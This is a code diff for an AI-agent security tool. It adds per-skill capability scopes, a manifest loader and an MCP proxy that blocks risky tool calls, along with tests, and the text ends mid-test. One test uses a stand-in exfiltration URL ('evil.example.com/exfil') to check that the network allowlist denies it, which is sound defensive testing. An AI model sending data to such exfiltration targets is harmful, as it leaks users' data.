diff --git a/src/cli.ts b/src/cli.ts index 277609c..5a9d216 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -22,6 +22,7 @@ import { import type { AgentGuardAgentHost, AgentGuardConfig } from './config.js'; import { SkillScanner } from './scanner/index.js'; import { formatProtectResult, protectAction, exitCodeForDecision } from './runtime/protect.js'; +import { defaultBrokerEvaluator, runMcpBrokerStdio } from './runtime/mcp-broker.js'; import { approvePendingApproval, listPendingApprovals } from './runtime/approvals.js'; import { getDefaultEffectiveRuntimePolicy, loadCachedPolicy, saveCachedPolicy } from './runtime/policy.js'; import type { RuntimeActionType, RuntimeAgentHost } from './runtime/types.js'; @@ -444,6 +445,30 @@ async function main() { process.exitCode = exitCodeForDecision(result.decision, result); }); + program + .command('mcp-broker') + .description('Proxy a downstream MCP server, vetoing tools/call traffic inline against runtime policy') + .argument('', 'Downstream MCP server command to spawn') + .argument('[args...]', 'Arguments passed to the downstream MCP server command') + .option('--agent ', 'Agent host label for audit, e.g. 
claude-code, codex', 'other') + .option('--source-skill ', 'Skill id to attribute tool calls to (enables capability scoping)') + .action(async (command: string, args: string[], options) => { + const config = ensureConfig(); + const exitCode = await runMcpBrokerStdio({ + command, + args, + evaluate: defaultBrokerEvaluator(config, options.agent as RuntimeAgentHost), + sourceSkill: options.sourceSkill, + onBlocked: (result) => { + console.error( + `[agentguard] blocked MCP tool call: ${result.decision.decision} ` + + `(risk ${result.decision.riskScore}/100, action ${result.decision.actionId})` + ); + }, + }); + process.exitCode = exitCode; + }); + program .command('subscribe') .description('Pull new threat-feed advisories from AgentGuard Cloud and run a self-check against locally installed skills') diff --git a/src/runtime/capabilities.ts b/src/runtime/capabilities.ts new file mode 100644 index 0000000..0a840e6 --- /dev/null +++ b/src/runtime/capabilities.ts @@ -0,0 +1,232 @@ +import { existsSync, readFileSync } from 'node:fs'; +import { join } from 'node:path'; +import { getAgentGuardPaths } from '../config.js'; +import { DEFAULT_CAPABILITY } from '../types/skill.js'; +import type { CapabilityModel } from '../types/skill.js'; +import { domainMatchesPattern, extractDomain } from '../utils/patterns.js'; +import type { EffectiveRuntimePolicy, PolicyReason, RuntimeAction } from './types.js'; + +/** Wildcard skill key applied to every declared-but-unmatched skill. */ +const WILDCARD_SKILL = '*'; + +export const CAPABILITY_REASON_CODES = [ + 'CAPABILITY_EXEC_DENIED', + 'CAPABILITY_NETWORK_DENIED', + 'CAPABILITY_FILE_DENIED', +] as const; + +export function isCapabilityReason(code: string): boolean { + return code.startsWith('CAPABILITY_'); +} + +export interface SkillScope { + /** Effective least-privilege capabilities for the action's skill. */ + capabilities: CapabilityModel; + /** True when the skill has an explicit manifest entry (is confined). 
*/ + scoped: boolean; +} + +/** + * Merge a partial capability override onto the most-restrictive default so an + * omitted field falls back to least privilege (DEFAULT_CAPABILITY). + */ +export function mergeCapabilities(override: Partial): CapabilityModel { + return { + network_allowlist: override.network_allowlist ?? [...DEFAULT_CAPABILITY.network_allowlist], + filesystem_allowlist: override.filesystem_allowlist ?? [...DEFAULT_CAPABILITY.filesystem_allowlist], + exec: override.exec ?? DEFAULT_CAPABILITY.exec, + secrets_allowlist: override.secrets_allowlist ?? [...DEFAULT_CAPABILITY.secrets_allowlist], + ...(override.web3 ? { web3: override.web3 } : {}), + }; +} + +/** + * Resolve the capability scope for an action. A skill is "scoped" only when the + * policy declares an entry for its sourceSkill (or a wildcard entry exists); + * undeclared skills are left unconfined so existing behavior is preserved. + */ +export function resolveSkillScope( + policy: EffectiveRuntimePolicy, + action: RuntimeAction +): SkillScope { + const manifest = policy.skillCapabilities; + if (!manifest) return { capabilities: mergeCapabilities({}), scoped: false }; + + // Precedence: a skill's own entry always wins. The wildcard ("*") is only + // consulted as a fallback for skills WITHOUT an explicit entry. Adding "*" to + // the manifest is itself the operator's explicit opt-in to confine every + // otherwise-undeclared skill; it never overrides a skill-specific scope. + const skillId = action.sourceSkill; + const entry = + (skillId && manifest[skillId]) || + manifest[WILDCARD_SKILL] || + undefined; + + if (!entry) return { capabilities: mergeCapabilities({}), scoped: false }; + return { capabilities: mergeCapabilities(entry), scoped: true }; +} + +/** + * Produce capability-violation reasons for a confined skill. 
These are emitted + * independently of the OSS threat scanner so a denial is honored even when the + * action looks otherwise benign (the scanner's risk-score gate would auto-allow + * it). Only exec / network / filesystem are enforced at runtime today; the + * secrets allowlist has no runtime action mapping and is intentionally skipped. + */ +export function capabilityScopeReasons( + capabilities: CapabilityModel, + action: RuntimeAction +): PolicyReason[] { + const reasons: PolicyReason[] = []; + + if (capabilities.exec === 'deny' && action.actionType === 'shell') { + reasons.push({ + code: 'CAPABILITY_EXEC_DENIED', + severity: 'high', + title: 'Command execution not permitted for skill', + description: `Skill "${action.sourceSkill}" is not granted the exec capability by its declared scope.`, + evidence: truncate(action.input), + remediation: 'Add `"exec": "allow"` to this skill\'s capability scope to permit command execution.', + }); + } + + if (capabilities.network_allowlist.length > 0) { + const denied = deniedNetworkTargets(action, capabilities.network_allowlist); + if (denied.length > 0) { + reasons.push({ + code: 'CAPABILITY_NETWORK_DENIED', + severity: 'high', + title: 'Network destination outside skill allowlist', + description: `Skill "${action.sourceSkill}" attempted to reach a host not in its network allowlist.`, + evidence: truncate(denied.join(', ')), + remediation: 'Add the host to this skill\'s `network_allowlist` to permit the request.', + }); + } + } + + if ( + capabilities.filesystem_allowlist.length > 0 && + (action.actionType === 'file_read' || action.actionType === 'file_write') && + !filesystemAllowed(action.input, capabilities.filesystem_allowlist) + ) { + reasons.push({ + code: 'CAPABILITY_FILE_DENIED', + severity: 'high', + title: 'File path outside skill allowlist', + description: `Skill "${action.sourceSkill}" attempted to access a path not in its filesystem allowlist.`, + evidence: truncate(action.input), + remediation: 'Add the path 
(or a `/**` prefix) to this skill\'s `filesystem_allowlist`.', + }); + } + + return reasons; +} + +/** + * Load a local capability manifest (JSON map of skillId -> partial capability). + * + * A *missing* file is the normal unconfigured case and yields an empty manifest + * silently. A *present but malformed* file is different: silently swallowing it + * would drop every per-skill restriction without the operator noticing. We + * therefore surface a loud warning to stderr in that case so the failure is + * observable, then fall back to the unconfined baseline (the OSS threat scanner + * still runs, so this is a return to default behavior, not a new privilege + * grant). We deliberately do not hard-fail the whole runtime here: confinement + * is an opt-in additive layer, and crashing policy resolution over an optional + * file would trade a narrow confinement gap for a total availability outage. + */ +export function loadSkillCapabilityManifest( + manifestPath: string = capabilityManifestPath() +): Record> { + if (!existsSync(manifestPath)) return {}; + try { + const parsed = JSON.parse(readFileSync(manifestPath, 'utf8')) as unknown; + return normalizeManifest(parsed); + } catch (err) { + const detail = err instanceof Error ? err.message : String(err); + process.stderr.write( + `[AgentGuard] WARNING: capability manifest at "${manifestPath}" is present but unreadable/malformed ` + + `(${detail}); per-skill confinement is NOT applied. 
Fix or remove the file.\n` + ); + return {}; + } +} + +export function capabilityManifestPath(): string { + return process.env.AGENTGUARD_CAPABILITIES_PATH || join(getAgentGuardPaths().home, 'capabilities.json'); +} + +function normalizeManifest(value: unknown): Record> { + if (!value || typeof value !== 'object' || Array.isArray(value)) return {}; + const out: Record> = {}; + for (const [skillId, raw] of Object.entries(value as Record)) { + const entry = normalizeCapabilityEntry(raw); + if (entry) out[skillId] = entry; + } + return out; +} + +function normalizeCapabilityEntry(value: unknown): Partial | null { + if (!value || typeof value !== 'object' || Array.isArray(value)) return null; + const record = value as Record; + const entry: Partial = {}; + const network = stringArray(record.network_allowlist); + const filesystem = stringArray(record.filesystem_allowlist); + const secrets = stringArray(record.secrets_allowlist); + if (network) entry.network_allowlist = network; + if (filesystem) entry.filesystem_allowlist = filesystem; + if (secrets) entry.secrets_allowlist = secrets; + if (record.exec === 'allow' || record.exec === 'deny') entry.exec = record.exec; + return entry; +} + +function stringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) return undefined; + return value.filter((item): item is string => typeof item === 'string'); +} + +function deniedNetworkTargets(action: RuntimeAction, allowlist: string[]): string[] { + const denied: string[] = []; + for (const reference of networkReferences(action)) { + const domain = referenceToDomain(reference); + if (!domain) continue; + if (!allowlist.some((pattern) => domainMatchesPattern(domain, pattern))) denied.push(domain); + } + return [...new Set(denied)]; +} + +function networkReferences(action: RuntimeAction): string[] { + if (action.actionType === 'network' || action.actionType === 'browser') { + return [action.input]; + } + if (action.actionType === 'shell') { + return 
[...action.input.matchAll(/https?:\/\/[^\s'"`<>]+/gi)].map((match) => match[0]); + } + return []; +} + +function referenceToDomain(reference: string): string | null { + const trimmed = reference.trim().replace(/[),.;\]]+$/g, ''); + if (!trimmed) return null; + const urlLike = /^[a-z][a-z0-9+.-]*:\/\//i.test(trimmed) ? trimmed : `https://${trimmed}`; + const domain = extractDomain(urlLike); + return domain ? domain.toLowerCase() : null; +} + +/** Mirror ActionScanner.handleFileOperation allowlist matching. */ +function filesystemAllowed(path: string, allowlist: string[]): boolean { + return allowlist.some((pattern) => { + if (pattern === '*') return true; + if (pattern.endsWith('/**')) return path.startsWith(pattern.slice(0, -3)); + if (pattern.endsWith('/*')) { + const prefix = pattern.slice(0, -2); + const remainder = path.slice(prefix.length); + return path.startsWith(prefix) && !remainder.includes('/'); + } + return path === pattern || path.startsWith(`${pattern}/`); + }); +} + +function truncate(value: string, max = 200): string { + return value.length > max ? `${value.slice(0, max)}…` : value; +} diff --git a/src/runtime/evaluator.ts b/src/runtime/evaluator.ts index d2023f2..70417eb 100644 --- a/src/runtime/evaluator.ts +++ b/src/runtime/evaluator.ts @@ -18,6 +18,7 @@ import type { RuntimeSeverity, } from './types.js'; import { redactPreview, redactReasons } from './redaction.js'; +import { capabilityScopeReasons, isCapabilityReason, resolveSkillScope } from './capabilities.js'; const ONE_MINUTE_MS = 60_000; const TEN_MINUTES_MS = 10 * ONE_MINUTE_MS; @@ -87,7 +88,10 @@ export async function evaluateLocalAction( action: RuntimeAction, options: LocalActionEvaluationOptions = {} ): Promise { - if (isAllowedByCommandPolicy(policy, action)) { + const scope = resolveSkillScope(policy, action); + const scopeReasons = scope.scoped ? 
capabilityScopeReasons(scope.capabilities, action) : []; + + if (scopeReasons.length === 0 && isAllowedByCommandPolicy(policy, action)) { return { actionId: `act_local_${Date.now()}_${process.pid}`, decision: 'allow', @@ -103,10 +107,14 @@ export async function evaluateLocalAction( const ossReasons = (ossDecision?.risk_tags || []).map((tag, index) => normalizeOssReason(tag, ossDecision?.evidence?.[index], action) ); - const reasons = redactReasons([...customReasons, ...ossReasons]); + const reasons = redactReasons([...scopeReasons, ...customReasons, ...ossReasons]); const riskScore = riskScoreFor(reasons, ossDecision?.risk_level || 'safe'); const riskLevel = riskLevelFor(riskScore); - const decision = shouldAutoAllowRuntimeDecision(riskScore, riskLevel) + // Capability denials are enforced even when the action's risk score would + // otherwise trip the auto-allow gate, so a confined skill cannot escape its + // declared scope by virtue of looking benign to the OSS scanner. + const hasCapabilityDenial = reasons.some((item) => isCapabilityReason(item.code)); + const decision = !hasCapabilityDenial && shouldAutoAllowRuntimeDecision(riskScore, riskLevel) ? 'allow' : decisionFor(policy, reasons, riskLevel, ossDecision?.decision); @@ -686,6 +694,7 @@ function decisionFor( function policyDecisionFor(reasonItem: PolicyReason, policy: EffectiveRuntimePolicy): CloudPolicyDecision | null { const code = reasonItem.code; + if (isCapabilityReason(code)) return policy.mode === 'strict' ? 
'block' : 'require_approval'; if (code === 'CUSTOM_BLOCKED_COMMAND' || code === 'DESTRUCTIVE_COMMAND') return policy.decisions.destructiveCommand; if (code === 'DESTRUCTIVE_FILE_OPERATION') return 'require_approval'; if (code === 'SYSTEM_PATH_MUTATION') return 'block'; diff --git a/src/runtime/mcp-broker.ts b/src/runtime/mcp-broker.ts new file mode 100644 index 0000000..6a529e9 --- /dev/null +++ b/src/runtime/mcp-broker.ts @@ -0,0 +1,239 @@ +import { spawn } from 'node:child_process'; +import type { AgentGuardConfig } from '../config.js'; +import { protectAction, type ProtectResult } from './protect.js'; +import type { RuntimeAgentHost } from './types.js'; + +/** + * Inline MCP enforcement broker. + * + * The AgentGuard MCP server (`mcp-server.ts`) is advisory: the agent has to + * choose to call `action_scanner_decide`. This broker is the opposite — it sits + * transparently in front of a downstream MCP server, forwards JSON-RPC traffic + * untouched, but intercepts `tools/call` requests and runs them through the same + * runtime policy used by the hook path (`protectAction`). A blocked call is + * never forwarded; instead a JSON-RPC error response is synthesized back to the + * agent so the tool simply appears to fail. + * + * A stdio proxy is non-interactive, so there is no channel to prompt the user + * mid-stream. The broker therefore fails closed: both `block` and + * `require_approval` decisions stop the call. Low-risk actions (which + * `protectAction` reports as `null`) are forwarded unchanged. + * + * Scope: stdio transport only. That is the sole MCP transport AgentGuard + * targets (see `mcp-server.ts` and the `type: 'stdio'` installer registration), + * so an SSE/HTTP proxy is intentionally out of scope. + */ + +export interface JsonRpcMessage { + jsonrpc?: string; + id?: string | number | null; + method?: string; + params?: Record; +} + +/** Evaluate a tool call. Returns a ProtectResult, or null when there is no opinion (low risk). 
*/ +export type BrokerEvaluator = (rawInput: Record) => Promise; + +export interface BrokerOptions { + evaluate: BrokerEvaluator; + sourceSkill?: string; +} + +export interface ClientLineOutcome { + /** Forward the original line unchanged to the downstream server. */ + forward: boolean; + /** A JSON-RPC error line to write back to the client instead of forwarding. */ + injectToClient?: string; + /** The blocking decision, for audit/logging. */ + blocked?: ProtectResult; +} + +/** JSON-RPC implementation-defined server error code for an AgentGuard veto. */ +const JSONRPC_BLOCKED_CODE = -32001; + +export function parseJsonRpc(line: string): JsonRpcMessage | null { + const trimmed = line.trim(); + if (!trimmed) return null; + try { + const parsed = JSON.parse(trimmed) as unknown; + if (!parsed || typeof parsed !== 'object' || Array.isArray(parsed)) return null; + return parsed as JsonRpcMessage; + } catch { + return null; + } +} + +export function isToolCall(message: JsonRpcMessage | null): message is JsonRpcMessage { + return Boolean( + message && + message.method === 'tools/call' && + message.params && + typeof message.params === 'object' + ); +} + +export function toolCallRawInput(message: JsonRpcMessage, options: BrokerOptions): Record { + const params = (message.params || {}) as Record; + const args = params.arguments && typeof params.arguments === 'object' ? params.arguments : {}; + return { + tool_name: typeof params.name === 'string' ? params.name : 'mcp_tool', + tool_input: args, + ...(options.sourceSkill ? { sourceSkill: options.sourceSkill } : {}), + }; +} + +export function blockedResponse(message: JsonRpcMessage, result: ProtectResult): string { + const reasons = result.decision.reasons + .map((reason) => reason.title) + .filter(Boolean) + .slice(0, 3) + .join(', '); + return JSON.stringify({ + jsonrpc: '2.0', + id: message.id ?? 
null, + error: { + code: JSONRPC_BLOCKED_CODE, + message: + `Blocked by AgentGuard: ${result.decision.decision} ` + + `(risk ${result.decision.riskScore}/100${reasons ? `; ${reasons}` : ''})`, + data: { + decision: result.decision.decision, + actionId: result.decision.actionId, + riskScore: result.decision.riskScore, + riskLevel: result.decision.riskLevel, + reasons: result.decision.reasons, + }, + }, + }); +} + +function isBlockingDecision(result: ProtectResult): boolean { + return result.decision.decision === 'block' || result.decision.decision === 'require_approval'; +} + +/** + * Decide what to do with a single client→server line. Non-tool-call traffic and + * unparseable lines are forwarded untouched so the broker never breaks the + * protocol; only `tools/call` requests are evaluated. + */ +export async function evaluateClientLine(line: string, options: BrokerOptions): Promise { + const message = parseJsonRpc(line); + if (!isToolCall(message)) return { forward: true }; + + const result = await options.evaluate(toolCallRawInput(message, options)); + if (result && isBlockingDecision(result)) { + return { forward: false, injectToClient: blockedResponse(message, result), blocked: result }; + } + return { forward: true }; +} + +/** Newline-delimited framing that tolerates chunk boundaries splitting a JSON message. 
*/ +export function createLineBuffer(onLine: (line: string) => void): { + push: (chunk: string) => void; + flush: () => void; +} { + let buffer = ''; + return { + push(chunk: string): void { + buffer += chunk; + let index = buffer.indexOf('\n'); + while (index >= 0) { + onLine(buffer.slice(0, index)); + buffer = buffer.slice(index + 1); + index = buffer.indexOf('\n'); + } + }, + flush(): void { + if (buffer.length > 0) { + onLine(buffer); + buffer = ''; + } + }, + }; +} + +export function defaultBrokerEvaluator( + config: AgentGuardConfig, + agentHost: RuntimeAgentHost = 'other' +): BrokerEvaluator { + return (rawInput) => protectAction({ config, rawInput, agentHost, phase: 'pre' }); +} + +export interface RunMcpBrokerStdioOptions extends BrokerOptions { + command: string; + args?: string[]; + stdin?: NodeJS.ReadableStream; + stdout?: NodeJS.WritableStream; + stderr?: NodeJS.WritableStream; + onBlocked?: (result: ProtectResult) => void; +} + +/** + * Spawn a downstream MCP server and proxy stdio between it and the client, + * vetoing tool calls inline. Resolves with the child's exit code. + */ +export function runMcpBrokerStdio(options: RunMcpBrokerStdioOptions): Promise { + const child = spawn(options.command, options.args ?? [], { stdio: ['pipe', 'pipe', 'pipe'] }); + const clientOut = options.stdout ?? process.stdout; + const clientErr = options.stderr ?? process.stderr; + const clientIn = options.stdin ?? process.stdin; + + // Single writer for the client stream. Downstream stdout chunks and the + // broker's own synthesized JSON-RPC errors share `clientOut`; funnelling both + // through one serialized queue keeps each message atomic so an injected error + // can never be spliced into the middle of a downstream response. The queue + // also honors backpressure (waits for `drain`) instead of unbounded buffering. 
+ let writeChain: Promise = Promise.resolve(); + const writeClient = (data: string | Buffer): void => { + writeChain = writeChain.then( + () => + new Promise((res) => { + if (clientOut.write(data)) res(); + else clientOut.once('drain', () => res()); + }) + ); + }; + + child.stdout.on('data', (chunk: Buffer) => writeClient(chunk)); + child.stderr.on('data', (chunk: Buffer) => clientErr.write(chunk)); + + // Serialize per-line handling so forwarding order is preserved across async + // policy evaluations. + let chain: Promise = Promise.resolve(); + const buffer = createLineBuffer((line) => { + chain = chain.then(async () => { + if (!line.trim()) { + child.stdin.write(`${line}\n`); + return; + } + const outcome = await evaluateClientLine(line, options); + if (outcome.forward) { + child.stdin.write(`${line}\n`); + } else if (outcome.injectToClient) { + writeClient(`${outcome.injectToClient}\n`); + if (outcome.blocked) options.onBlocked?.(outcome.blocked); + } + }); + }); + + clientIn.on('data', (chunk: Buffer) => buffer.push(chunk.toString('utf8'))); + clientIn.on('end', () => { + buffer.flush(); + chain.then(() => child.stdin.end()).catch(() => child.stdin.end()); + }); + + // Resolve only after the child has exited AND every buffered evaluation plus + // its client write has drained. Resolving on `exit` alone could drop a + // synthesized block response that was still in flight when the child died. + // The child's own exit code is propagated unchanged. + return new Promise((resolve) => { + const settle = (code: number) => { + chain + .then(() => writeChain) + .then(() => resolve(code)) + .catch(() => resolve(code)); + }; + child.on('exit', (code) => settle(code ?? 
0)); + child.on('error', () => settle(1)); + }); +} diff --git a/src/runtime/policy.ts b/src/runtime/policy.ts index 3fd7ebb..009081c 100644 --- a/src/runtime/policy.ts +++ b/src/runtime/policy.ts @@ -1,5 +1,7 @@ import { existsSync, mkdirSync, readFileSync, writeFileSync } from 'node:fs'; import { dirname } from 'node:path'; +import type { CapabilityModel } from '../types/skill.js'; +import { loadSkillCapabilityManifest } from './capabilities.js'; import type { EffectiveRuntimePolicy } from './types.js'; export function getDefaultEffectiveRuntimePolicy(): EffectiveRuntimePolicy { @@ -65,7 +67,7 @@ export async function resolveRuntimePolicy(options: { const cloudPolicy = await options.fetchPolicy(); if (cloudPolicy) { saveCachedPolicy(options.cachePath, cloudPolicy); - return { policy: cloudPolicy, source: 'cloud' }; + return { policy: withLocalCapabilityManifest(cloudPolicy), source: 'cloud' }; } } catch { // Fall through to cache/default. @@ -73,6 +75,22 @@ export async function resolveRuntimePolicy(options: { } const cached = loadCachedPolicy(options.cachePath); - if (cached) return { policy: cached, source: 'cache' }; - return { policy: getDefaultEffectiveRuntimePolicy(), source: 'default' }; + if (cached) return { policy: withLocalCapabilityManifest(cached), source: 'cache' }; + return { policy: withLocalCapabilityManifest(getDefaultEffectiveRuntimePolicy()), source: 'default' }; +} + +/** + * Overlay the local capability manifest (`capabilities.json`) onto the resolved + * policy. Local entries take precedence over any cloud-supplied scope so an + * operator can confine a skill without a cloud round-trip. Returns the policy + * unchanged when no local manifest entries exist. 
+ */ +function withLocalCapabilityManifest(policy: EffectiveRuntimePolicy): EffectiveRuntimePolicy { + const local = loadSkillCapabilityManifest(); + if (Object.keys(local).length === 0) return policy; + const merged: Record> = { + ...(policy.skillCapabilities || {}), + ...local, + }; + return { ...policy, skillCapabilities: merged }; } diff --git a/src/runtime/types.ts b/src/runtime/types.ts index 60cc09e..77db55e 100644 --- a/src/runtime/types.ts +++ b/src/runtime/types.ts @@ -1,3 +1,5 @@ +import type { CapabilityModel } from '../types/skill.js'; + export type CloudPolicyDecision = 'allow' | 'warn' | 'require_approval' | 'block'; export type RuntimeRiskLevel = 'safe' | 'low' | 'medium' | 'high' | 'critical'; export type RuntimeSeverity = 'info' | 'low' | 'medium' | 'high' | 'critical'; @@ -49,6 +51,13 @@ export interface EffectiveRuntimePolicy { blockedCommandPatterns: string[]; allowedCommandPatterns: string[]; approvalActionTypes: RuntimeActionType[]; + /** + * Per-skill capability scopes keyed by initiating skill id. When an entry + * exists for an action's sourceSkill, the skill is "declared" and confined + * to the listed capabilities (least privilege; omitted fields fall back to + * DEFAULT_CAPABILITY). Skills with no entry keep the permissive default. 
+ */ + skillCapabilities?: Record>; network: { defaultOutbound: CloudPolicyDecision; blockedDomains: string[]; diff --git a/src/tests/capabilities.test.ts b/src/tests/capabilities.test.ts new file mode 100644 index 0000000..fb4c079 --- /dev/null +++ b/src/tests/capabilities.test.ts @@ -0,0 +1,236 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, writeFileSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { evaluateLocalAction } from '../runtime/evaluator.js'; +import { getDefaultEffectiveRuntimePolicy, resolveRuntimePolicy } from '../runtime/policy.js'; +import { loadSkillCapabilityManifest } from '../runtime/capabilities.js'; +import type { CapabilityModel } from '../types/skill.js'; +import type { EffectiveRuntimePolicy, RuntimeAction } from '../runtime/types.js'; + +function policyWithScopes( + scopes: Record>, + overrides: Partial = {} +): EffectiveRuntimePolicy { + return { ...getDefaultEffectiveRuntimePolicy(), skillCapabilities: scopes, ...overrides }; +} + +function action(partial: Partial): RuntimeAction { + return { + sessionId: 'sess_caps', + agentHost: 'openclaw', + actionType: 'shell', + toolName: 'exec', + input: '', + ...partial, + }; +} + +describe('Per-skill capability scopes', () => { + it('leaves undeclared skills unconfined', async () => { + const policy = policyWithScopes({ 'other-skill': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'my-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'allow'); + assert.ok(!decision.reasons.some((r) => r.code.startsWith('CAPABILITY_'))); + }); + + it('does not confine when the policy declares no scopes at all', async () => { + const policy = getDefaultEffectiveRuntimePolicy(); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'my-skill', input: 'echo hello' }) + ); + + 
assert.ok(!decision.reasons.some((r) => r.code.startsWith('CAPABILITY_'))); + }); + + it('denies exec for a declared skill without the exec capability', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'require_approval'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('blocks exec under strict mode for a confined skill', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'deny' } }, { mode: 'strict' }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.equal(decision.decision, 'block'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('allows exec when the declared scope grants it', async () => { + const policy = policyWithScopes({ 'confined-skill': { exec: 'allow' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'confined-skill', input: 'echo hello' }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); + + it('denies network destinations outside the skill allowlist', async () => { + const policy = policyWithScopes({ + 'net-skill': { network_allowlist: ['api.allowed.com'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'net-skill', + actionType: 'network', + toolName: 'fetch', + input: 'https://evil.example.com/exfil', + }) + ); + + assert.ok(['require_approval', 'block'].includes(decision.decision)); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_NETWORK_DENIED')); + }); + + it('permits network destinations inside the skill allowlist', async () => { + const policy = policyWithScopes({ + 'net-skill': { network_allowlist: 
['api.allowed.com'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'net-skill', + actionType: 'network', + toolName: 'fetch', + input: 'https://api.allowed.com/v1/data', + }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_NETWORK_DENIED')); + }); + + it('denies file paths outside the skill filesystem allowlist', async () => { + const policy = policyWithScopes({ + 'fs-skill': { filesystem_allowlist: ['/workspace/**'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'fs-skill', + actionType: 'file_read', + toolName: 'read', + input: '/home/other/notes.txt', + }) + ); + + assert.equal(decision.decision, 'require_approval'); + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_FILE_DENIED')); + }); + + it('permits file paths inside the skill filesystem allowlist', async () => { + const policy = policyWithScopes({ + 'fs-skill': { filesystem_allowlist: ['/workspace/**'] }, + }); + const decision = await evaluateLocalAction( + policy, + action({ + sourceSkill: 'fs-skill', + actionType: 'file_read', + toolName: 'read', + input: '/workspace/project/notes.txt', + }) + ); + + assert.ok(!decision.reasons.some((r) => r.code === 'CAPABILITY_FILE_DENIED')); + }); + + it('applies the wildcard scope to any declared-but-unmatched skill', async () => { + const policy = policyWithScopes({ '*': { exec: 'deny' } }); + const decision = await evaluateLocalAction( + policy, + action({ sourceSkill: 'whatever-skill', input: 'echo hello' }) + ); + + assert.ok(decision.reasons.some((r) => r.code === 'CAPABILITY_EXEC_DENIED')); + }); +}); + +describe('Capability manifest loading', () => { + it('reads a manifest file and normalizes entries', () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-')); + const path = join(dir, 'capabilities.json'); + writeFileSync( + path, + JSON.stringify({ + 'skill-a': { exec: 'deny', network_allowlist: ['api.good.com'], bogus: 1 
}, + 'skill-b': 'not-an-object', + }) + ); + + const manifest = loadSkillCapabilityManifest(path); + assert.deepEqual(manifest['skill-a'], { exec: 'deny', network_allowlist: ['api.good.com'] }); + assert.ok(!('skill-b' in manifest)); + }); + + it('returns an empty manifest for a missing file', () => { + assert.deepEqual(loadSkillCapabilityManifest(join(tmpdir(), 'does-not-exist-caps.json')), {}); + }); + + it('surfaces a stderr warning for a present-but-malformed manifest instead of swallowing it', () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-bad-')); + const path = join(dir, 'capabilities.json'); + writeFileSync(path, '{ this is not valid json '); + + const original = process.stderr.write.bind(process.stderr); + let captured = ''; + (process.stderr as { write: unknown }).write = (chunk: string | Uint8Array): boolean => { + captured += chunk.toString(); + return true; + }; + try { + const manifest = loadSkillCapabilityManifest(path); + assert.deepEqual(manifest, {}, 'falls back to the unconfined baseline'); + } finally { + (process.stderr as { write: unknown }).write = original; + } + + assert.match(captured, /AgentGuard.*WARNING/); + assert.match(captured, /malformed/); + assert.ok(captured.includes(path), 'warning names the offending file'); + }); + + it('overlays the local manifest onto the resolved policy with local precedence', async () => { + const dir = mkdtempSync(join(tmpdir(), 'agentguard-caps-resolve-')); + const manifestPath = join(dir, 'capabilities.json'); + writeFileSync(manifestPath, JSON.stringify({ 'skill-a': { exec: 'deny' } })); + const prev = process.env.AGENTGUARD_CAPABILITIES_PATH; + process.env.AGENTGUARD_CAPABILITIES_PATH = manifestPath; + + try { + const cloudPolicy: EffectiveRuntimePolicy = { + ...getDefaultEffectiveRuntimePolicy(), + skillCapabilities: { + 'skill-a': { exec: 'allow' }, + 'skill-b': { exec: 'allow' }, + }, + }; + const { policy } = await resolveRuntimePolicy({ + cachePath: join(dir, 
'policy-cache.json'), + fetchPolicy: async () => cloudPolicy, + }); + + assert.equal(policy.skillCapabilities?.['skill-a']?.exec, 'deny'); + assert.equal(policy.skillCapabilities?.['skill-b']?.exec, 'allow'); + } finally { + if (prev === undefined) delete process.env.AGENTGUARD_CAPABILITIES_PATH; + else process.env.AGENTGUARD_CAPABILITIES_PATH = prev; + } + }); +}); diff --git a/src/tests/mcp-broker.test.ts b/src/tests/mcp-broker.test.ts new file mode 100644 index 0000000..5f22349 --- /dev/null +++ b/src/tests/mcp-broker.test.ts @@ -0,0 +1,199 @@ +import { describe, it } from 'node:test'; +import assert from 'node:assert/strict'; +import { PassThrough } from 'node:stream'; +import { + createLineBuffer, + evaluateClientLine, + isToolCall, + parseJsonRpc, + runMcpBrokerStdio, + toolCallRawInput, + type BrokerEvaluator, +} from '../runtime/mcp-broker.js'; +import type { ProtectResult } from '../runtime/protect.js'; +import type { CloudPolicyDecision } from '../runtime/types.js'; + +function protectResult(decision: CloudPolicyDecision): ProtectResult { + return { + decision: { + actionId: 'act_test_1', + decision, + riskScore: decision === 'block' ? 95 : 55, + riskLevel: decision === 'block' ? 
